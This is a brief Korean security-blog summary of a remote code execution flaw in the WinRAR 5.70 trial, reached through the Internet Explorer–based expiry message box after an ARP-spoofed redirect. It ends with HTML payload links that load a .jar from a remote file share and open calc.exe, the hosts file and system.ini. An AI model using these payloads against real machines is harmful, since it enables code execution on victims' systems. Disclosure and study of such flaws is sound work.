[하루한줄] WinRAR’s vulnerable trialware: when free software isn’t free - hackyboiz

URL

WinRAR’s vulnerable trialware: when free software isn’t free

Target

WinRAR Version 5.70 trial

Explain

WinRAR의 무료 체험판에서 원격 코드 실행 취약점이 발견되었습니다. WinRAR는 Windows 운영체제에 저장된 파일들을 관리하는 응용프로그램으로, RAR나 ZIP파일의 생성과 언패킹 등의 기능이 있습니다.

WinRAR의 무료 체험 기간이 종료되면 이를 알리는 메세지 박스가 화면에 나타나는데, 해당 메세지 박스가 호출하는 Internet Explorer instance를 통해 원격 코드 실행이 가능합니다. 해커는 메세지 박스를 WinRAR의 서버로 부터 영구적으로 redirection 시키고 박스에 원하는 컨텐츠를 삽입할 수 있습니다. 악성 도메인으로 부터 spoofing된 ARP 패킷을 통해 로컬 호스트에서 임의 코드 실행이 가능합니다.

<a href="file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br>
<a href="\\\\10.0.12.34/applications/test.jar">\\\\10.0.12.34/applications/test.jar</a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:\\\\windows\\\\system.ini">file:///C:\\\\windows\\\\system.ini</a><br>